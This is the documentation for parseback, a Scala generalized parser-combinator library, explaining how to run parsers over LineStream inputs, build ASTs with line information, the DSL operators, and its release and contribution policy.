is "any single character class". Thus, \s+ is valid, as is [ \t]+, but //[^\n]*|\s+ is not. We hope to lift this restriction soon, but it requires some work on the algorithm. ApplicationApplication So how do we apply a parser to a given input stream, now that we've declared the parser? The first thing we need to do is convert the input stream into a LineStream. LineStream[F] is an abstraction inside parseback representing a lazy cons list of lines, where each tail is produced within an effect, F. It is very literally StreamT[F, Line], where Line is a String with some metadata (notably including line number). This is a relatively broad abstraction, and allows for basically anything which can be incrementally produced within a monadic effect, including fs2.Stream (or to be more precise, fs2.Pull), IO, Future, or in the case of our simple examples, Eval. LineStream contains some helpful constructors which can build streams from some common inputs, including a plain-old String (which may contain multiple lines). This is the constructor we're going to use in all of our examples: import cats.Eval val input: LineStream[Eval] = LineStream[Eval]("1 + 2") The exact monad doesn't really matter here, so long as it obeys the monad laws. We're constructing a line stream, input, from an already-in-memory value, so there is no need for any sort of complex effect control. In fact, the constructor String => LineStream[F] accepts any Applicative[F], and cats.Eval is just a convenient one. Another convenient applicative might be scalaz.Need. Once we have our input, we can apply our parser to it to produce a result: val result: Eval[Either[List[ParseError], List[Int]]] = expr(input) Note that the apply method on Parser requires a Monad[F], where the F comes from the LineStream[F] it was supplied. Naturally, we have to get the result "out" of the monad in order to see it, which is trivial in the case of Eval: result.value // => Right(List(3)) The results are contained within an Either, and then a List within that. The left side of the Either is how errors can be represented in the case of invalid input, while the right side is where the parsed values are. As this is a generalized parser, it is possible (when you have a globally ambiguous grammar) to produce more than one result for a single input. For example, this might have happened to us if we hadn't factored our grammar to encode precedence. And there you have it! We can apply our parser to any input we like. For example, we can test that precedence is working correctly: expr(LineStream[Eval]("3 + 4 * 5")).value // => Right(List(23)) expr(LineStream[Eval]("(3 + 4) * 5")).value // => Right(List(35)) If we hadn't correctly encoded precedence by factoring the grammar (specifically, by splitting expr and term), the first line above would have produced Right(List(23, 35)), reflecting the fact that both interpretations would be permissible. And just as a sanity check, we can verify that things which shouldn't parse, don't: expr(LineStream[Eval]("3 + *")).value This will produce the following value (within the Left(List(): UnexpectedCharacter(Line("3 + *", 0, 4), Set("""\d+""", "-", "(")) The Line here contains line number and column offset information indicating the * character, while the Set indicates the possible expected valid tokens which could have appeared at that location. Thus, even though PWD isn't a predictive parsing algorithm, it is still able to give fairly decent error messages. Pretty-printed, this error might look like this: error:1:5: unexpected character, '*', expected one of: \d+, -, ( 3 + * ^ So long as you can construct a LineStream[F] for something, and that F has a lawful Monad, you can parse it. For example, here's a simple function that applies a parser to an fs2 Stream of lines: import fs2._ def parseLines[F[_], A](lines: Stream[F, String], parser: Parser[A]): Stream[F, Either[ParseError, A]] = { def mkLines(h: Handle[F, String]): Pull[F, Nothing, LineStream[Pull[F, Nothing, ?]]] = h.await1Option map { case Some((line, h2)) => LineStream.More(Line(line), mkLines(h2)) case None => LineStream.Empty() } lines.pull { h => mkLines(h) flatMap { ls => parser(ls) } flatMap { case Left(errs) => Pull output (Chunk seq (errs map { Right(_) })) case Right(results) => Pull output (Chunk seq (results map { Left(_) })) } } } And there you have generalized, incremental parsing on an ephemeral stream, effectively for free. We're taking advantage of the fact that fs2 allows us to incrementally traverse a Stream via Pull, which forms a monad in its resource. Building TreesBuilding Trees Evaluating expressions in-place is all well and good, but parseback's API is really designed for building ASTs for use in larger systems, such as compilers. In order to do this, we're going to need some structure: sealed trait Expr { def loc: List[Line] } final case class Mul(loc: List[Line], left: Expr, right: Expr) extends Expr final case class Div(loc: List[Line], left: Expr, right: Expr) extends Expr final case class Add(loc: List[Line], left: Expr, right: Expr) extends Expr final case class Sub(loc: List[Line], left: Expr, right: Expr) extends Expr final case class Neg(loc: List[Line], inner: Expr) extends Expr final case class Num(loc: List[Line], value: Int) extends Expr This is a very straightforward AST that includes line information, just as you might expect inside a simple compiler. We can modify our original grammar to produce this AST, rather than directly evaluating the expressions: implicit val W = Whitespace("""\s+"""r) lazy val expr: Parser[Expr] = ( expr ~ "+" ~ term ^^ { (loc, e, _, t) => Add(loc, e, t) } | expr ~ "-" ~ term ^^ { (loc, e, _, t) => Sub(loc, e, t) } | term ) lazy val term: Parser[Expr] = ( expr ~ "*" ~ factor ^^ { (loc, e, _, f) => Mul(loc, e, t) } | expr ~ "/" ~ factor ^^ { (loc, e, _, f) => Div(loc, e, t) } | factor ) lazy val factor: Parser[Expr] = ( "(" ~> expr <~ ")" | "-" ~ expr ^^ { (loc, _, e) => Neg(loc, e) } | """\d+""".r ^^ { (loc, str) => Num(loc, str.toInt) } ) Now if we apply our parser to a sample input, we should receive an expression tree, rather than a value: expr(LineStream[Eval]("2 * -3 + 4")).value Within the "either of lists", this will produce: Mul(_, Num(_, 2), Add(_, Neg(_, Num(_, 3)), Num(_, 4))) I've elided the List[Line] values, just to make things more clear, but suffice it to say that they are there, and they represent the line(s) on which the given construct may be found. This information is very commonly baked into an AST at parse time so that it can be used later in compilation or interpretation to produce error messages relevant to the original declaration site in syntax. Each AST node contains all lines which comprise its syntactic elements, not just the first one, so you have maximal flexibility in how you want to represent things. If all you want is the first line, you're certainly free to call .head on the loc value inside of the parser reductions (the list of lines is always guaranteed to be non-empty). DSL ReferenceDSL Reference |– Composition of two parsers by union. Both parsers must produce the same type ~– Composition of two parsers by sequence. Both results are retained in a Tuple2(parseback defines infix ~as an alias for Tuple2) ~>– Composition of two parsers by sequence, discarding the left result <~– Composition of two parsers by sequence, discarding the right result ^^– Map the results of a parser by the specified function, which will be passed the lines consumed by the parser to produce its results ^^^– Map the results of a parser to a single constant value "..."– Construct a parser which consumes exactly the given string, producing that string as a result """...""".r– Construct a parser which consumes any string which matches the given regular expression, producing the matching string as a result. Regular expressions may not span multiple lines, and beginning-of-line/end-of-line may be matched with the ^/ $anchors. ()– Construct a parser which always succeeds, consuming nothing, producing ()as a result Forks and ReleasesForks and Releases Fork away! It's Github. Parseback uses a hash-based version scheme for snapshot releases (see the comments in build.sbt for more details), which means that you should feel free to publish snapshot releases to your personal bintray (or other repositories). The hash-based version prevents Ivy eviction from causing downstream conflicts, and also ensures that any other people pushing that same release will be producing identical artifacts. I have two requests. First, please sign your releases (with the publishSigned SBT command). All releases that I make will be signed with my public key (3587 7FB3 2BAE 5960). Furthermore, any stable release that I make will be tagged and the tagging commit will be signed with the same key. Second, please only push snapshot releases (with versions ending in a git hash or -SNAPSHOT). If multiple people push incompatible 0.3s to different hosts, madness and confusion will ensue in downstream projects. If you need to push a stable release (non-hash/snapshot), please change the group id. That should prevent conflicts while also ensuring that no one is stuck waiting for me to publish a release that fixes their particular bug. Contributing and LegalContributing and Legal Contributions are very welcome! Issuing a pull request constitutes your agreement to license your contributions under the Apache License 2.0 (see LICENSE.txt). I will not incorporate changes without a pull request. Please don't pull request someone else's work (unless they are explicitly involved in the PR on github). If you create a new file, please be sure to replicate the copyright header from the other files.
https://index.scala-lang.org/djspiewak/parseback/parseback-cats/0.3.0-7aba028?target=_2.12
CC-MAIN-2021-39
refinedweb
5,218
51.99
Here's a bit of eye-candy I whipped up to drop into our product: epAssist. The program has a system tray icon and a context menu comes up when you click on the icon. One problem with tray icons, it that it can be easy for users to confuse what the menu for your program looks like. My first solution was to place a disabled menu item with the application name at the top of the menu, but this didn't have the effect I needed. Upon searching my favorite developer site, I found a few menu classes that could act like the Windows Start Menu. I based my menu off these articles and a few others, making as few changes as required to get the effect I needed. The class presented here is by no means original, but I believe that the way the components are put together produces a original and impressive UI component. The first and easiest use of this class is to place a context menu on the screen. The sample code below shows how to setup and use the simple interface this menu exposes. There are a few shortcomings. First, the menu does not send Command UI messages for enabling/checking menu items. Secondly, messages are sent to the window that owns the menu. If you look at the sample application, you will notice that the view handles ID_APP_EXIT1 and posts ID_APP_EXIT to the MainFrame. If the view handled ID_APP_EXIT and posted it to the frame, standard MFC command routing would have the view intercepting the message first (again!) ID_APP_EXIT1 ID_APP_EXIT #include "GradientMenu.h" void CGrMenuTestView::OnContextMenu(CWnd* pWnd, CPoint point) { // Set up the colours.. Might want these in program options COLORREF rgb1(RGB(0, 0, 0)); COLORREF rgb2(RGB(128, 128, 255)); COLORREF rgbText(RGB(255, 255, 255)); // Create a menu, set the width of gradient CGradientMenu oMenu(24, TRUE); oMenu.LoadMenu(IDR_POPUP_MENU); // Select colours and set the title for the 1st menu // sub menus will take the name of the item selected in the parent. oMenu.SetGradientColors(rgb1, rgb2, rgbText); oMenu.SetTitle((CString)"Test"); // Show the menu! oMenu.TrackPopupMenu(0, point.x, point.y, this); // Done! } That's it. You need to give the root menu a title, but the sub-menus will get their title from their parent. For the main program menu, I simply faked it out. The main menu has no popups, but handles the WM_COMMAND and puts a popup under the menu item. See the sample for full details. WM.
http://www.codeproject.com/Articles/505/Gradient-Menus-in-MFC?msg=4154
CC-MAIN-2014-41
refinedweb
422
72.36
Jaime Rodriguez On Windows Store apps, Windows Phone, HTML and XAML!! Last week, the WPF test team released a new version of their Test API: 0.2. You can download the new release from their codeplex site. The Test API is a library with utilities for testing WPF and Windows Forms applications.. The best way to learn about the lib this is to download it, play with it and read their docs; that said, if you want to learn more before you download, Ivo the WPF test manager has some good blog posts on their 0.1 release. For feedback, you can go to the codeplex forums. They need help prioritizing the features in the next version. Among the most interesting ones, I see controls verification, state management APIs, property comparisons, performance, and leak detection. I am voting for the last two!! How bout u? The. You know the drill.. raw, unedited, yet deep and useful WPF conversations !! Subject: Changing Resources from Triggers I have a complex ControlTemplate that I want to change colors when the mouse is over it. The colors are used at various places deep within the template, and some are even in nested templates …. … Answer: To change Resources on a Trigger is to change a non-DP property on a Trigger. WPF does not currently support this. As a workaround could you try the following pattern? <ControlTemplate> <SomeElement1 x: <SomeElement1.Style> <Style> <Style.Resources> <SomeResource1 x: </Style.Resources> </Style> </SomeElement1.Style> <SomeElement1.Template> <ControlTemplate> <SomeElement1_1 SomeProperty="{DynamicResource blah}" /> </ControlTemplate> </SomeElement1.Template> </SomeElement1> <ControlTemplate.Triggers> <Trigger Property="AnotherProperty" Value="anotherValue"> <Setter Property="Style" TargetName="element1"> <Setter.Value> <Style> <Style.Resources> <SomeResource2 x: </Style.Resources> </Style> </Setter.Value> </Setter> </Trigger> </ControlTemplate.Triggers> </ControlTemplate> Subject: Creating WPF window prevents application from closing Window window = new Window(); Putting this line anywhere in my WPF application without actually using this window variable prevents my application from closing when I hit the main window close button. Why would creating an instance of Window have this effect? Only if I add a subsequent window.Close() call does my application shut down correctly. Window window = new Window(); window.Close(); Window window = new Window(); window.Close(); Answer: If you do Application.Current.Shutdown() your app should close. I assume you’re doing Application.Current.MainWindow.Close(). There’s a property on Application called ShutdownMode. The default is OnLastWindowClose. Since you’ve created a window and not closed it, your app will never shut down. You can change Application.ShutdownMode to OnMainWindowClose, and you should be fine. Subject: Coerced value not reflected in control or others bound to it as sources I have the following xaml. The CustomTextBox overrides metadata for the Text Dependency Property, which calls a coerce method, which upshifts whatever the user enters. However, the upshifted value does not show up in either TextBox. If I move the binding to the 2nd text box, so it binds to the first, it will display the upshifted text correctly. Why is the upshifted string not showing up in the original case (i.e. as below)? <StackPanel Margin="20" VerticalAlignment="Center"> <Label Content="Target TextBox (with coercion to uppercase)"/> <src:CustomTextBox x:Name="TargetTextBox" Text="{Binding ElementName=SourceTextBox, Path=Text, Mode=TwoWay, UpdateSourceTrigger=PropertyChanged}" Margin="0,0,0,20"/> <Label Content="Source TextBox"/> <TextBox x:Name="SourceTextBox" IsReadOnly="True" Background="LightGray" </StackPanel> Answer: Here’s a bit of background on coercion. The classic case of coercion is the Slider control where the Value property’s value needs to always lie between the MaxValue and the MinValue. So in this regard we envisioned Coersion to be a view concept. Hence we made a design decision not to propagate coerced values through data Binding. Thus the fact that you don’t see a coerced value on CustomTextBox.Text propagate through the Binding back to the source is ‘By Design’. Yes it can be argued that when Binding is used in the way you’ve shown below to bind two UI pieces then one would want to propagate the coerced value through the Binding. Sam Bent (our Data Services guru), has some thoughts on building some configuration parameters on Binding to allow this. However none of that exists in the platform as of today. As for a Binding on a regular TextBox.Text property displaying the upshifted Text, the reason is that the value at the source is transferred as is to the target of a Binding. The special rule about coercion only comes into play when the value at the target is being coerced. Subject: Creating Bindings in a Data Template I’m trying to create a DataTemplate where some non-FE objects bind to the DataContext of the DataTemplate. My XAML looks something like this? <DataTemplate DataType="{x:Type api:SeahorseItem}"> <Button CommandParameter="{Binding RelativeSource={RelativeSource Self}}"> <con:DoubleClickButton.Command> <con:MetaCommand <con:MetaCommandEntry <con:MetaCommandEntry <con:MetaCommandEntry </con:MetaCommand> </con:DoubleClickButton.Command> </Button > </DataTemplate> When I run my application I get the following error message: System.Windows.Data Error: 2 : Cannot find governing FrameworkElement or FrameworkContentElement for target element. BindingExpression:(no path); DataItem=null; target element is 'MetaCommandEntry' (HashCode=51095287); target property is 'CommandParameter' (type 'Object') When I actually debug this, the CommandParameters on my entries and the command itself are null. I’ve done some digging, and it seems that my problem is that my objects are not FEs, and as a result not part of the inheritance tree. I also saw a neat trick that allows me to make my objects a part of the inheritance tree by making them freezables. This worked for the MetaCommand, allowing it’s binding to work. But the Entries still evaluate to null. Answer: Could you make the collection property that holds on to the MetaCommandEntries be of type FreezableCollection<MetaCommandEntry> and MetaCommandEntry should also subclass Freezable. The reason for these changes is that InheritanceContext is internal to the framework and Freezable and FreezableCollection are the only two non-FE/FCE public classes that support it. Subject: DataGrid different template for new row problem. I’m trying to show a different template for the last row of my DataGrid to show not the default row template but show a line of text say “Click here to add new item”. I came across this blog I improved it a little bit by listening to InitializingNewItem event and saved the Dispatcher trick. But I still need to listen to several event, use VisualTreeHelper to set the focus on the first cell of last row. I wonder if there is a easier way to do this in general. I believe this is a very common scenario. Answer: We hear you. We will look to make this scenario easier in a future release. But what you see in the blog is what we have today. Subject: Font change events? I need to detect when font setting for a specific element in my FlowDocument changes, either because it’s (local) font property or its container’s property (inheritable) changes. Is it possible? (I do not see an event that looks that way; I need to change some other properties because of the font change). Alternatively, is there any way for me to detect that the document is about to re-render and do these mods then? Answer: You could try DependecyPropertyDescriptor.AddValueChanged. The dependency property would be TextElement.FontSizeProperty Subject: How to display 1st underscore in Label ? I would like to display 1st underscore “_” in Label. I know 1st “_” means keyboard shortcut. But he don’t use shortcut but want to display it. How to escape make “_” shortcut ? Obvious Answer: Try double “_” as markup below. <Label Content="__Label"/> Follow-up: Yes, I did, but I have to add extra underscore to all underscore such as A__B__C__D instead of A__B_C_D. Next answer: The simplest solution would be to use TextBlock instead of Label. Otherwise, you could re-template Label to change RecognizesAccessKey to false : <ControlTemplate TargetType="{x:Type Label}"> <Border ...> <ContentPresenter ... </Border> .. </ControlTemplate> Subject: Is there any easy way to get the size of a ImageSource I'm implementing a cache for ImageSource. I was looking the documentation but I could not find a easy way to get the Size (in bytes) of a ImageSource. Is there a easy way to do that? Answer: A size property doesn’t make sense for all implementers of ImageSource. The two platform ones (according to MSDN) are DrawingImage and BitmapSource. DrawingImage is specified in XAML, so its size would not be representative of a pixel width x height x depth measure in bytes. Take a look at the ImageSource documentation and inheritance tree: You can get a size for the pixels of a BitmapSource using PixelWidth, PixelHeight, and Format.BitsPerPixel. Obviously the object itself can store some more information depending on the implementation. So I think you might want to implement a cache for the BitmapSource class rather than ImageSource Subject: Closest to immediate-mode rendering in WPF What is the closest I can get to immediate-mode rendering in WPF? Right now I’m overriding OnRender and basically re-populating the DrawingContext on every frame (since a physics engine is involved, everything moves). Is that the best way? Also, I noticed that there is no way to apply pixel shaders in the DrawingContext like we can do in XNA. Is there any (potentially hacky) way to push a pixel shader into DrawingContext? Seems odd that we can push bitmap effects but not hardware accelerated effects. Answer: That’s as close as it gets. Not sure if it matters to you, since you’re changing everything every frame, but it’s probably worth noting that the dirty region logic operates at the Visual level. Which is to say if you draw everything in 1 DrawingContext, you get no dirty subregion support for all that content. Having said that, what exactly is changing in your scene? If things are moving/rotating while maintaining a rigid shape, it might make more sense to draw everything once, then simply update the transforms every frame with the physics engine inputs. This is much more “WPFy”, and if it fits within the constraints of your system, it should also be more efficient than changing the DC content every frame. No way to push an effect in a DC. The method of drawing you’re using is not really the one for which WPF is optimized. Bitmap effects are going away. If you pick up a 4.0 beta build, they’re already gone. Subject: Making one color in a bitmap transparent I’m fairly new at WPF, so if there is an obvious answer to this question, it’s likely the right one. I’m trying to convert some old WinForms code to WPF and I’m running into a snag displaying Bitmap images. All of the bitmaps in my application have the same background color which is intended to be displayed as transparent. In WinForms I could achieve this effect by creating an ImageList and setting the TransparentColor property to be this particular color. How can I achieve the same effect with WPF? Answers: There's no default support in wpf to do this. However Dwayne has blogged about how to do this. If you have a small number of bitmaps, it’s probably easier to make them transparent yourself in a photo editing app and save as PNG. After. Date, Location, and Logistics Location Dates Los Angeles, CA 4/24 -4/25 London, UK 5/15 -5/16 New York, NY 5/29-5/30 Chicago, IL 6/12-6/13 Phoenix, AZ 6/5-6/6 Registration tips:If you are not a partner or don't know if you are: When asked "are you registered" select No. Select "Visiting partner" under Partner Level. Get creative on the Partner Type; if in doubt, we are all "System builders" Format: Instructor-led training from 9 AM to 5:30 PM. 15 minute breaks every couple hours. 45 minutes lunch around mid-day. Food: Breakfast, lunch and afternoon snacks are provided. Detailed Agenda.
http://blogs.msdn.com/b/jaimer/archive/2009/04.aspx
CC-MAIN-2015-11
refinedweb
2,016
57.47
0 Hello *, I was writing an assert() stmt when I realized the following (see code). Can anyone explain why/how. My final aim is to be able to write an assert stmt for verifying that my function (a demo function) works fine. I heard from someone that there are special assert-macros/comparision-operators for floating point arithmatic. Is it trur? #include <iostream> using namespace std ; int main() { double a = 2.2, b = 1234.5678 ; double c = a * b ; //accorging to windows' calc.exe 2.2 * 1234.5678 = 2716.04916 //which of course is correct if you multiply manually if( 2716.04916 == c ) cout << "Cacl.exe and C++ give same results" << endl ; else cout << "Cacl.exe gives 2716.04916 and C++ gives "<< c << endl ; //so we know that assert( 2716.04916 == c ) will fail for sure. return 0; } When I run the code (compiled and run on VC 6.0) this is the output I get: ------------------------------------------------------------------ Cacl.exe gives 2716.04916 and C++ gives 2716.05 Press any key to continue ------------------------------------------------------------------
https://www.daniweb.com/programming/software-development/threads/73810/floating-point-multiplication-precision-issues
CC-MAIN-2018-30
refinedweb
171
80.28
...one of the most highly regarded and expertly designed C++ library projects in the world. — Herb Sutter and Andrei Alexandrescu, C++ Coding Standards This tutorial program shows how to use asio to implement a client application with UDP. #include <iostream> #include <boost/array.hpp> #include <boost/asio.hpp> using boost::asio::ip::udp; The start of the application is essentially the same as for the TCP daytime client. int main(int argc, char* argv[]) { try { if (argc != 2) { std::cerr << "Usage: client <host>" << std::endl; return 1; } boost::asio::io_service io_service; We use an ip::udp::resolver object to find the correct remote endpoint to use based on the host and service names. The query is restricted to return only IPv4 endpoints by the ip::udp::v4() argument. udp::resolver resolver(io_service); udp::resolver::query query(udp::v4(), argv[1], "daytime"); The ip::udp::resolver::resolve() function is guaranteed to return at least one endpoint in the list if it does not fail. This means it is safe to dereference the return value directly. udp::endpoint receiver_endpoint = *resolver.resolve(query); Since UDP is datagram-oriented, we will not be using a stream socket. Create an ip::udp::socket and initiate contact with the remote endpoint. udp::socket socket(io_service); socket.open(udp::v4()); boost::array<char, 1> send_buf = { 0 }; socket.send_to(boost::asio::buffer(send_buf), receiver_endpoint); Now we need to be ready to accept whatever the server sends back to us. The endpoint on our side that receives the server's response will be initialised by ip::udp::socket::receive_from(). boost::array<char, 128> recv_buf; udp::endpoint sender_endpoint; size_t len = socket.receive_from( boost::asio::buffer(recv_buf), sender_endpoint); std::cout.write(recv_buf.data(), len); } Finally, handle any exceptions that may have been thrown. catch (std::exception& e) { std::cerr << e.what() << std::endl; } return 0; } See the full source listing Return to the tutorial index Previous: Daytime.3 - An asynchronous TCP daytime server Next: Daytime.5 - A synchronous UDP daytime server
http://www.boost.org/doc/libs/1_45_0/doc/html/boost_asio/tutorial/tutdaytime4.html
CC-MAIN-2016-30
refinedweb
330
51.85
I need the output to be look like this: Enter the amount of the purchases: (user enters 44.28) Enter the cash tendered: (user enters 50) Your change is equal to 5.71999999999 which is... 5 dollars 72 cents 2 quarter (s) 2 dime(s) 0 nickel (s) 2 pennie (s) ----------------------------------------------------------- As you can see the basic of the program is inform the user how much of each coin they get back with their change... if anyone can help me it would be a huge help! package lab02; / Purpose: Compute the amount of change a customer should receive (in terms of dollars, quarters, dimes, nickels, and pennies) given the amount of the purchase and the cash tendered. @author jdoe / import java.util.Scanner; public class Change { /* @param args / public static void main(String[] args) { double purchaseAmt; double cashTendered; double totalChange; int dollars, cents; // Create a Scanner object to read from standard input Scanner scan = new Scanner(System.in); // Prompt the user and read in amount of purchase and // cash tendered. System.out.print("Enter the amount of the purchase: "); purchaseAmt = scan.nextDouble(); System.out.print("Enter the cash tendered: "); cashTendered = scan.nextDouble(); totalChange = cashTendered - purchaseAmt; dollars = (int) totalChange; System.out.println(); System.out.println ("Your change is $" totalChange " which is ..."); System.out.println(dollars + " dollars"); System.out.println(); } }
http://www.javaprogrammingforums.com/object-oriented-programming/5325-new-so-lost-trying-learn.html
CC-MAIN-2014-35
refinedweb
218
57.47
Read a CML file and output a vtkMolecule object. More... #include <vtkCMLMoleculeReader.h> Read a CML file and output a vtkMolecule object. Definition at line 30 of file vtkCMLMoleculeReader.h. Definition at line 34 of file vtkCMLMoleculeAlgorithm. Methods invoked by print to print information about the object including superclasses. Typically not called by the user (use Print() instead) but used in the hierarchical print process to combine the output of several classes. Reimplemented from vtkMoleculeAlgorithm. Get/Set the output (vtkMolecule) that the reader will fill. Get/Set the name of the CML file. This is called by the superclass. This is the method you should override. Reimplemented from vtkMoleculeAlgorithm. Fill the output port information objects for this algorithm. This is invoked by the first call to GetOutputPortInformation for each port so subclasses can specify what they can handle. Reimplemented from vtkMoleculeAlgorithm. Definition at line 60 of file vtkCMLMoleculeReader.h.
https://vtk.org/doc/nightly/html/classvtkCMLMoleculeReader.html
CC-MAIN-2019-51
refinedweb
149
62.34
Alone on a Friday night, in need of some inspiration, you decide to relive some of your past programming conquests. The old archive hard drive slowly spins up, and the source code of the glory days scrolls by... Oh no. This is not at all what you expected. Were things really this bad? Why did no one tell you? Why were you like this? Is it even possible to have that many gotos in a single function? You quickly close the project. For a brief second, you consider deleting it and scrubbing the hard drive. What follows is a compilation of lessons, snippets, and words of warning salvaged from my own excursion into the past. Names have not been changed, to expose the guilty. 2004 I was thirteen. The project was called Red Moon -- a wildly ambitious third-person jet combat game. The few bits of code that were not copied verbatim out of Developing Games in Java were patently atrocious. Let's look at an example. I wanted to give the player multiple weapons to switch between. The plan was to rotate the weapon model down inside the player model, swap it out for the next weapon, then rotate it back. Here's the animation code. Don't think about it too hard. public void updateAnimation(long eTime) { if(group.getGroup("gun") == null) { group.addGroup((PolygonGroup)gun.clone()); } changeTime -= eTime; if(changing && changeTime <= 0) {: [font='courier new']weaponSwitchTimer [/font]and [font='courier new']weaponCurrent[/font]. Everything else can be derived from those two variables. Explicitly initialize everything. This function checks if the weapon is [font=consolas][size=1]null[/font] and initializes it if necessary. Thirty seconds of contemplation would reveal that the player always has a weapon in this game, and if they don't, the game is unplayable and might as well crash anyway. Clearly, at some point, I encountered a [font='courier new']NullPointerException [/font]in this function, and instead of thinking about why it happened, I threw in a quick [font='courier new']null [/font(TM), which resulted in monstrosities like this: class Mesh {public: static std::list * GetMaterials(); // Gets the list of materials in this mesh std::vector |*protected: ID3DXMesh* d3dmesh; // Actual mesh data LPCSTR filename; // Mesh file name; used for caching DWORD numSubsets; // Number of subsets (materials) in the mesh std::vector|materials; // List of materials; loaded from X file std::vector (TM),(TM). Maybe [font='courier new']killLocal()[/font] [font='courier new']self.[/font] [font='courier new'][/font] element, and a single line of code that inextricably binds the two together. Type in the text field, and pow! The [font='courier new'] [/font]magically updates. In the context of a game, it looks something like this: public class Player{ public Property Name = new Property { Value = "Ryu" };}public class TextElement : UIComponent{ public Property Text = new Property { Value = "" };}label.add(new Binding : IProperty{ protected Type _value; protected List bindings; public Type Value { get { return this._value; } set { this._value = value; for (int i = this.bindings.Count - 1; i >= 0; i = Math.Min(this.bindings.Count - 1, i - 1)) this.bindings.OnChanged(this); } }} Every single field in the game, down to the last boolean, had an unwieldy dynamically allocated array attached to it. Take a look at the loop that notifies the bindings of a property change to get an idea of the issues I ran into with this paradigm. It has to iterate through the binding list backward, since a binding could actually add or delete UI elements, causing the binding list to change. Still, I loved data binding so much that I built the entire game on top of it. I broke down objects into components and bound their properties together. Things quickly got out of hand. jump.Add(new Binding (transform.Position, rollKickSlide.Position));rollKickSlide.Predictor = predictor;rollKickSlide.Bind(model);rollKickSlide.VoxelTools = voxelTools;rollKickSlide.Add(new CommandBinding(rollKickSlide.DeactivateWallRun, (Action)wallRun.Deactivate));rollKickSlide.Add(new CommandBinding(rollKickSlide.Footstep, footsteps.Footstep)); I ran into tons of problems. I created binding cycles that caused infinite loops. I found out that initialization order is often important, and initialization is a nightmare with data binding, with some properties getting initialized multiple times as bindings are added. When it came time to add animation, I found that data binding made it difficult and non-intuitive to animate between two states. And this isn't just me. Watch this Netflix talk which gushes about how great React is before explaining how they have to turn it off any time they run an animation. I too realized the power of turning a binding on or off, so I added a new field: class Binding { public bool Enabled;} Unfortunately, this defeated the purpose of data binding. I wanted to get rid of UI state, and this code actually added some. How can I eliminate this state? I know! Data binding! class Binding { public Property Enabled = new Property { Value = true };} Yes, I really did try this briefly. It was bindings all the way down. I soon realized how crazy it was. How can we improve on data binding? Try making your UI actually functional and stateless. dear imgui is a great example of this. Separate behavior and state as much as possible. Avoid techniques that make it easy to create state. It should be a pain for you to create state. Conclusion. Here's the takeaway: - Make decisions upfront instead of lazily leaving them to the computer. - Separate behavior and state. - Write pure functions. - Write the client code first. - Write boring code. That's my story. What horrors from your past are you willing to share? If you enjoyed this article, try these: - Read more... - 9 comments - 1605 views
https://www.gamedev.net/blogs/blog/832-etodd-makes-games/?m=1&y=2013
CC-MAIN-2017-30
refinedweb
948
59.19
What does Ruby have that Python doesn't, and vice versa?. Python Example Functions are first-class variables in Python. You can declare a function, pass it around as an object, and overwrite it: def func(): print "hello"def another_func(f): f()another_func(func)def func2(): print "goodbye"func = func2 This is a fundamental feature of modern scripting languages. JavaScript and Lua do this, too. Ruby doesn't treat functions this way; naming a function calls it. Of course, there are ways to do these things in Ruby, but they're not first-class operations. For example, you can wrap a function with Proc.new to treat it as a variable--but then it's no longer a function; it's an object with a "call" method. Ruby's functions aren't first-class objects Ruby functions aren't first-class objects. Functions must be wrapped in an object to pass them around; the resulting object can't be treated like a function. Functions can't be assigned in a first-class manner; instead, a function in its container object must be called to modify them. def func; p "Hello" enddef another_func(f); method(f)[] endanother_func(:func) # => "Hello"def func2; print "Goodbye!"self.class.send(:define_method, :func, method(:func2))func # => "Goodbye!"method(:func).owner # => Objectfunc # => "Goodbye!"self.func # => "Goodbye!" Ultimately all answers are going to be subjective at some level, and the answers posted so far pretty much prove that you can't point to any one feature that isn't doable in the other language in an equally nice (if not similar) way, since both languages are very concise and expressive. I like Python's syntax. However, you have to dig a bit deeper than syntax to find the true beauty of Ruby. There is zenlike beauty in Ruby's consistency. While no trivial example can possibly explain this completely, I'll try to come up with one here just to explain what I mean. Reverse the words in this string: sentence = "backwards is sentence This" When you think about how you would do it, you'd do the following: - Split the sentence up into words - Reverse the words - Re-join the words back into a string In Ruby, you'd do this: sentence.split.reverse.join ' ' Exactly as you think about it, in the same sequence, one method call after another. In python, it would look more like this: " ".join(reversed(sentence.split())) It's not hard to understand, but it doesn't quite have the same flow. The subject (sentence) is buried in the middle. The operations are a mix of functions and object methods. This is a trivial example, but one discovers many different examples when really working with and understanding Ruby, especially on non-trivial tasks.
https://codehunter.cc/a/python/what-does-ruby-have-that-python-doesnt-and-vice-versa
CC-MAIN-2022-21
refinedweb
461
64.1
Check if the given permutation is a valid BFS of a given tree Introduction Breadth-First Search(or BFS) is an essential level-based graph traversing algorithm that can be used to solve several problems based on the simple concepts of graphs. These include finding the shortest path in a graph and solving puzzle games like Rubik's Cubes. This blog will discuss one such problem that will utilize this concept of BFS. Let us first understand the problem before jumping onto the solution. Problem Statement You have been given a tree having N nodes, being numbered from 1 to N. You have also been given a permutation array, i.e., an array containing all elements from 1 to N in a specific order. Your task is to check if this given permutation can be obtained by performing BFS traversal on the given tree. Also, note that the traversal will always start from 1. Let's look at an easy example to gain a clear picture of the problem: Example - Edges of the tree given: - 1 - 2 - 2 - 3 A = {1, 2, 3} The given permutation is a valid BFS of the tree that has been given. Approach - One thing that needs to be kept in mind is that while performing BFS traversal on a tree, all the neighbors of the current node are visited and their children are pushed into the queue in an ordered manner. This process is repeated until the queue becomes empty. - Assume that root has two children, A and B. We have the option of visiting any of them first. Let's say we go to A first, but now we'll have to push the children of A to the front of the queue, and we won't be able to visit the children of B before A. - So, although we can visit the children of one node in any order, the order in which the children of two different nodes should be visited is fixed, i.e., if A is visited before B, then all of A's children should be visited before all of B's children. We will use this concept to solve the problem given here. Algorithm - We will start with an empty queue of sets. - In each set, we'll push the children of a specific node while traversing the permutation. - We will proceed if the current element of the permutation is found in the set at the top of the queue; else, we will return false. Implementation Program // C++ program to check if the given permutation is a valid BFS of a given tree. #include <iostream> #include <vector> #include <queue> #include <unordered_set> #include <unordered_map> using namespace std; // Function to check if the given permutation is a valid BFS of a given tree. bool isValidBFS(vector<int> & bfs, unordered_map<int, vector<int>> & tree) { // If the first element of 'BFS' is not present in the tree, return false. if (tree.count(bfs[0]) == 0) { return false; } // Number of nodes in the tree. int n = bfs.size(); // 'VISITED' hash set to keep track of visited nodes. unordered_set<int> visited; // 'LEVEL' hash set to keep track of nodes at each level. unordered_set<int> level; // Inserting root node. level.insert(bfs[0]); // Queue for BFS traversal. queue<unordered_set<int>> q; // Inserting the root level in front of the queue. q.push(level); // Variable to iterate over 'BFS' array. int i = 